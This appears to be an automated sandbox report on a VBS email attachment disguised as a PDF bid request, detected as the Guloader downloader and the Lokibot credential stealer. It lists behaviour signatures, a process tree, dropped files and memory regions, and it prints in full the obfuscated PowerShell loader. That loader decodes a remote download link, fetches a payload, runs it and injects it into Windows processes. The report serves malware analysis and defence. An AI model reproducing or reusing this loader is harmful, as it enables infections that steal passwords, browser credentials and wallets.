Overview

overview

10

Static

static

1

BID REQUES...df.vbs

windows7-x64

10

BID REQUES...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-09-2024 14:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BID REQUEST 09-09-2024·pdf.vbs

  • Size

    28KB

  • MD5

    3cc67d448a578ff541499696264c340a

  • SHA1

    7bac2915c8f873a8f27c40ba197854ab0417b4e3

  • SHA256

    c26253cd77cc444cdbf4d0cb2abb2aab166485f749777677ea749d4f850fc859

  • SHA512

    74adc64258c27028ca5c340cb1a2323a88c887d43310feef908bcbb59c80d055173fa747db0349c939c386f0dba3fd0cb40754092eee1c46a75375d011cb0664

  • SSDEEP

    384:1qh1bFGXrSOQ6aY2/w1MpmQkH13hhX7wc:1qhtkrPfaY2/w1MpzkVxhLH

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderexecutionspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3568
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
        3⤵
          PID:3068
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:64
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
              PID:4912
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:1776
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                  PID:3616
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  4⤵
                    PID:4352
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe"
                    4⤵
                      PID:1928
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe"
                      4⤵
                        PID:4988
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe"
                        4⤵
                          PID:5048
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          4⤵
                            PID:860
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe"
                            4⤵
                              PID:2360
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe"
                              4⤵
                                PID:4764
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe"
                                4⤵
                                  PID:2464
                                • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                  "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                  4⤵
                                    PID:4688
                                  • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                    "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                    4⤵
                                    • Accesses Microsoft Outlook profiles
                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    • outlook_office_path
                                    • outlook_win_path
                                    PID:4024

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hsk0auo1.35f.ps1
                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Carbines.Que
                              Filesize

                              421KB

                              MD5

                              fed7d2b1a62075a148249e5d86063b30

                              SHA1

                              f2e3c9605313437d6dc1668982f8d8c21d42d75d

                              SHA256

                              c31da00f237eeb4bc98b2d1396d5bdb56c51c18d4ede431dcd6049e4a78f18ba

                              SHA512

                              66f6fa6b5af2c09bee449cc9560194fa82a23affc4c90e2e3698458fab319a50163f5b581e8ff734dd7de6d0a12151d10c0b6011f3346f6568becc6707675450

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-355097885-2402257403-2971294179-1000\0f5007522459c86e95ffcc62f32308f1_30dd1cc1-5c25-4745-b2f5-cffa52b1a886
                              Filesize

                              46B

                              MD5

                              d898504a722bff1524134c6ab6a5eaa5

                              SHA1

                              e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

                              SHA256

                              878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

                              SHA512

                              26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

                              Download Submit

                            • memory/2820-41-0x0000000007370000-0x0000000007392000-memory.dmp

                              Filesize

                              136KB

                              Download

                            • memory/2820-37-0x00000000061D0000-0x000000000621C000-memory.dmp

                              Filesize

                              304KB

                              Download

                            • memory/2820-44-0x0000000008700000-0x000000000C26E000-memory.dmp

                              Filesize

                              59.4MB

                              Download

                            • memory/2820-42-0x0000000008150000-0x00000000086F4000-memory.dmp

                              Filesize

                              5.6MB

                              Download

                            • memory/2820-21-0x0000000002830000-0x0000000002866000-memory.dmp

                              Filesize

                              216KB

                              Download

                            • memory/2820-22-0x0000000005230000-0x0000000005858000-memory.dmp

                              Filesize

                              6.2MB

                              Download

                            • memory/2820-23-0x0000000005190000-0x00000000051B2000-memory.dmp

                              Filesize

                              136KB

                              Download

                            • memory/2820-24-0x0000000005960000-0x00000000059C6000-memory.dmp

                              Filesize

                              408KB

                              Download

                            • memory/2820-25-0x0000000005A80000-0x0000000005AE6000-memory.dmp

                              Filesize

                              408KB

                              Download

                            • memory/2820-35-0x0000000005B30000-0x0000000005E84000-memory.dmp

                              Filesize

                              3.3MB

                              Download

                            • memory/2820-36-0x0000000006140000-0x000000000615E000-memory.dmp

                              Filesize

                              120KB

                              Download

                            • memory/2820-40-0x0000000007450000-0x00000000074E6000-memory.dmp

                              Filesize

                              600KB

                              Download

                            • memory/2820-38-0x0000000007AD0000-0x000000000814A000-memory.dmp

                              Filesize

                              6.5MB

                              Download

                            • memory/2820-39-0x00000000066E0000-0x00000000066FA000-memory.dmp

                              Filesize

                              104KB

                              Download

                            • memory/3568-16-0x00007FFBC2360000-0x00007FFBC2E21000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/3568-4-0x00007FFBC2363000-0x00007FFBC2365000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/3568-19-0x00007FFBC2360000-0x00007FFBC2E21000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/3568-15-0x00007FFBC2360000-0x00007FFBC2E21000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/3568-18-0x00007FFBC2363000-0x00007FFBC2365000-memory.dmp

